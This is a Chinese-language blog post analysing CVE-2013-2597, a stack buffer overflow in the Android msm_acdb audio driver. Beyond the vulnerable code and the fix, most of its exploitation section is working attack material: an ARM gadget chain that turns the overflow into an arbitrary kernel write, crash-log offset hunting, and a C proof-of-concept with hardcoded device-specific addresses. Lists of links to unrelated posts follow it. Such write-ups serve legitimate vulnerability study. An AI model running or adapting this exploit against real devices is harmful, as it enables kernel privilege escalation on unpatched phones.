/*

本文章由 莫灰灰 编写,转载请注明出处。

作者:莫灰灰    邮箱: minzhenfei@163.com

*/

1. 漏洞描写叙述

音频驱动acdb提供了一个ioctl的系统接口让应用层调用,然而,其在处理传进来的參数时没有做有效的边界检查。应用程序能够通过/dev/msm_acdb设备文件就能达到提升权限的目的。

2. 漏洞分析

原始代码例如以下
if (size <= 0) {

	pr_err("%s: Invalid size sent to driver: %d\n",

		__func__, size);

	result = -EFAULT;

	goto done;

}

if (copy_from_user(data, (void *)(arg + sizeof(size)), size)) {

	pr_err("%s: fail to copy table size %d\n", __func__, size);

	result = -EFAULT;

	goto done;

}
acdb驱动在处理ioctl的时候,仅仅对输入的參数大小做了size<=0的推断,而没有做>的推断,紧接着,copy_from_user(data, (void *)(arg + sizeof(size)), size)的调用造成局部变量data的栈溢出。






3. 漏洞利用
1.原来的流程 - do_vfs_ioctl调用acdb_ioctl后返回



do_vfs_ioctl:

STMPW [SP], { R4-R9, LR }

...

BL acdb_ioctl

...

ADD SP, SP, #$44 // (2)

LDMUW [SP], { R4-R9, PC } // (1)



2.acdb_ioctl当中一段,能够获得控制PC的机会。改动寄存器的位置是 (3),这里能够操作R4-PC的全部数值了


acdb_ioctl:

...

ADD SP, SP, #$84

LDMUW [SP], { R4-R11, PC } // (3)


通过栈溢出,改动R5,R9,PC的值。


3.上面的指令,通过堆栈溢出,控制PC的值,跳转到以下代码运行


STR R5, [R9] // (4)

LDMUW [SP], { R4-R10, PC } // (5)


此处很关键,主要通过STR指令,将R5的值设置到R9的地址中,即通过栈溢出达到随意地址写的目的。



4.运行(5)之后,为了堆栈平衡,栈要填充 4*8 字节,然后设置下一跳的PC,即返回到(2)那里去


ADD SP, SP, #$24 // (6)

LDMUW [SP], { R4-R9, PC }


5.实际栈的位置和p->data的位置须要硬编码适配。
p->data[...]的値须要初始化的时候设置。
硬编码的地址请在pc上通过崩溃的日志分析。
p->data[i]=i 这样来试探(注:给数据标上相对偏移,方便通过栈来定位),这个样例中,PC在&p->data[0x9c]的位置。
例:
ACDB=> ACDB ioctl not found!

Unable to handle kernel paging request at virtual address 9f9e9d9c

pgd = df56c000

[9f9e9d9c] *pgd=00000000

Internal error: Oops: 80000005 [#1] PREEMPT SMP

Modules linked in:

CPU: 1 Tainted: G W (3.0.8+1.0.21100-02148-g79e6d0e #1)

PC is at 0x9f9e9d9c

LR is at acdb_ioctl+0x740/0x860


6.设置好堆栈布局

((unsigned int)&p->data[0x80]) = value;     //r5: PC - 4*7

((unsigned int)&p->data[0x90]) = address;   //r9: PC - 4*3

((unsigned int)&p->data[0x9c]) = (4)的地址; //pc: PC

((unsigned int)&p->data[0xbc]) = (6)地址;   //pc: PC + 4*8


4. PoC
static int

write_value(const acdb_param *param, unsigned long address, unsigned long value)

{

    const char *device_name = "/dev/msm_acdb";

    struct acdb_ioctl arg;

    int fd;

    int ret;

    int i;

    fd = open(device_name, O_RDONLY);

    if (fd < 0) {

      ALOGI("failed to open %s due to %s.\n", device_name, strerror(errno));

      return -1;

    }

    arg.size = param->pc2.pos + 4;

    for (i = 0; i < arg.size; i += 4) {

      *(unsigned long int *)&arg.data[i] = i;

    }

    *(unsigned long int *)&arg.data[param->address_pos] = address; // R9<span style="white-space:pre">	</span>

    *(unsigned long int *)&arg.data[param->value_pos] = value; // R5

    *(unsigned long int *)&arg.data[param->pc1.pos] = param->pc1.value; //

    *(unsigned long int *)&arg.data[param->pc2.pos] = param->pc2.value; //

    ret = ioctl(fd, 9999, &arg); // 随意触发一个ioctl,造成堆栈溢出,使得随意地址写入漏洞的触发

    close(fd);

    return 0;

}




当中,param的值相应例如以下:


{ DEVICE_SO05D_7_0_D_1_137,       { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },




5.漏洞修复


添加了对size上限的控制








參考文章:


http://retme.net/index.php/2014/03/31/CVE-2013-2597-acdb.html



https://www.codeaurora.org/projects/security-advisories/stack-based-buffer-overflow-acdb-audio-driver-cve-2013-2597



https://gist.github.com/fi01/5857693









												


											
Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)的更多相关文章
	

    
								
  1. BUFFER OVERFLOW 10 Vulnerability & Exploit Example
		
    SRC= http://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html THE VULNERABLE AND THE EXPLOIT     W ...
    
		
    2. 
						
  2. CVE-2016-2502-drivers/usb/gadget/f_serial.c in the Qualcomm USB driver in Android. Buffer Overflow Vulnerability reported by #plzdonthackme, Soctt.
		
    CVE-2016-2502-drivers/usb/gadget/f_serial.c in the Qualcomm USB driver in Android.Buffer Overflow Vu ...
    
		
    3. 
						
  3. buffer overflow
		
    Computer Systems A Programmer's Perspective Second Edition We have seen that C does not perform any  ...
    
		
    4. 
						
  4. buffer overflow vulnerabilitie
		
    Computer Systems A Programmer's Perspective Second Edition Avoiding security holes.For many years,bu ...
    
		
    5. 
						
  5. ORA-20000: ORU-10027: buffer overflow, limit of 10000 bytes
		
        要用dbms_output.put_line来输出语句,遇到以下错误: ERROR 位于第 1 行: ORA-20000: ORU-10027: buffer overflow, limit  ...
    
		
    6. 
						
  6. CVE-2016-10190 FFmpeg Http协议 heap buffer overflow漏洞分析及利用
		
    作者:栈长@蚂蚁金服巴斯光年安全实验室 -------- 1. 背景 FFmpeg是一个著名的处理音视频的开源项目,非常多的播放器.转码器以及视频网站都用到了FFmpeg作为内核或者是处理流媒体的工具 ...
    
		
    7. 
						
  7. 缓存溢出Buffer Overflow
		
    缓存溢出(Buffer overflow),是指在存在缓存溢出安全漏洞的计算机中,攻击者可以用超出常规长度的字符数来填满一个域,通常是内存区地址.在某些情况下,这些过量的字符能够作为“可执行”代码来运 ...
    
		
    8. 
						
  8. (原创)攻击方式学习之(3) - 缓冲区溢出(Buffer Overflow)
		
    堆栈溢出 堆栈溢出通常是所有的缓冲区溢出中最容易进行利用的.了解堆栈溢出之前,先了解以下几个概念: 缓冲区 简单说来是一块连续的计算机内存区域,可以保存相同数据类型的多个实例. 堆栈     堆 栈是 ...
    
		
    9. 
						
  9. Writing buffer overflow exploits - a tutorial for beginners
		
    Buffer overflows in user input dependent buffers have become one of the biggest security hazards on  ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. ASA QOS限速
			
    cisco的Qos限速和H3C的有点区别,不过总体来说,H3C的比较渣,单位是不一样的,H3C 的CAR单位的是kpbs,而cisco police限速时的单位是Bits per seconds,H3 ...
    
			
    2. 
						
  2. PV(访问量)、UV(独立访客)、IP(独立IP) (转)
			
    网站统计中的PV(访问量):UV(独立访客):IP(独立IP)的定义与区别今天使用了雅虎统计,看到里面就有这个,就说说,其实里面的uv大家可能觉得很新奇,但是和站长统计里的独立访客是一样的嘛.---- ...
    
			
    3. 
						
  3. hdu4389(数位dp)
			
    题目连接:http://acm.hdu.edu.cn/showproblem.php?pid=4389 题意:f(x)表示x各位的数字和. 给定1<=L<=R<=10^9, 求[L, ...
    
			
    4. 
						
  4. python六核心编程——条件和循环
			
    1.if声明 单 if 通过使用布尔运算符的声明 and , or 和 not. if-elif-else. elif即else if if expression1:      expr1_true_ ...
    
			
    5. 
						
  5. String的split
			
    对于  http://10.13.30.22/svn/SVNRepository/UnChecked/Test  想要分割他就要用: String subContent[]=modelInfo.get ...
    
			
    6. 
						
  6. Ajax动态载入xml文件内容
			
    <%@page import="javax.swing.JOptionPane"%> <%@page import="com.ctl.util.*&qu ...
    
			
    7. 
						
  7. mindmanager2012打开文件出现runtime error r6025  解决方式
			
    关于mindmanager 2012启动无法执行,提示c++错误 ---------------------------Microsoft Visual C++ Runtime Library---- ...
    
			
    8. 
						
  8. RESTEasy:@FormParam、@PathParam、@QueryParam、@HeaderParam、@CookieParam、@MatrixParam说明
			
    在第一RESTEasy教程我们已经学习了基本的Web服务和休息我们已经测试了一个简单的REST风格的Web服务.在本教程中,我们将显示如何将Web应用程序元素(形式参数,查询参数和更多)为REST风格 ...
    
			
    9. 
						
  9. BEGINNING SHAREPOINT&#174; 2013 DEVELOPMENT 第15章节--开发SP2013工作流应用程序 总结
			
    BEGINNING SHAREPOINT® 2013 DEVELOPMENT 第15章节--开发SP2013工作流应用程序 总结         在SP2013中,工作流已经从SP Server中脱离 ...
    
			
    10. 
						
  10. 有关信息ACM/ICPC竞争环境GCC/G++叠插件研究记录的扩展
			
    0.起因 有时.DFS总是比BFS受人喜爱--毕竟DFS简单粗暴,更,而有些东西BFS不要启动,DFS它似乎是一个可行的选择-- 但是有一个问题,DFS默认直接写入到系统堆栈.系统堆栈和足够浅,此时O ...
    
			
    11.